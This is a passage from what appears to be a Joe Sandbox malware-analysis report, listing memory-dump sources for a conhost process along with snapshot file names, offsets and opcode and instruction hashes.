                                                                                                • Instruction Fuzzy Hash: 01E0D871E25C1A0BE7B1F75884D56B423D1E71C340F1501B1C828D32A1DE386D814781
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b890000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                                • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                                                                • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                                • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f2c0e5def1d3d59bb26f377754146174647e5addb9f86df912c2841c9269ac66
                                                                                                • Instruction ID: 96e0d7a0bcaf6762c9a7b40b30b3e87487ef78e3eb26263cc39ac91a18b40c1d
                                                                                                • Opcode Fuzzy Hash: f2c0e5def1d3d59bb26f377754146174647e5addb9f86df912c2841c9269ac66
                                                                                                • Instruction Fuzzy Hash: D3C0EA20F2AD1E9BEAA8B3A884662B951C65F4C700B560474D1AED32E2DD2DAA404A50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b252ab7d853b7a7ce2735f057feeb795ea4443b1ff1f74f8770849f1a297f874
                                                                                                • Instruction ID: d02332c6764806ac7eadfc11aa089a4a2e42208b49c495d1a469f046ccd1ae0c
                                                                                                • Opcode Fuzzy Hash: b252ab7d853b7a7ce2735f057feeb795ea4443b1ff1f74f8770849f1a297f874
                                                                                                • Instruction Fuzzy Hash: CFC04C14F19C2A47E3696218483167D04929B48754F950074E46D976DECD2C5A1216C7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b8a1000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 22c0f85be38833c9e9902a2a0e4f14f72f945995ede4d930356bf2512360dc9d
                                                                                                • Instruction ID: e425a0db9fe55fa0ec8003d36a69f58f0e46986591355cacf7f74b1150c8a269
                                                                                                • Opcode Fuzzy Hash: 22c0f85be38833c9e9902a2a0e4f14f72f945995ede4d930356bf2512360dc9d
                                                                                                • Instruction Fuzzy Hash: C5A00205D97C0E02D81832FA2E9709474545F8E115FC62AA0EC188059AEA9E26E94393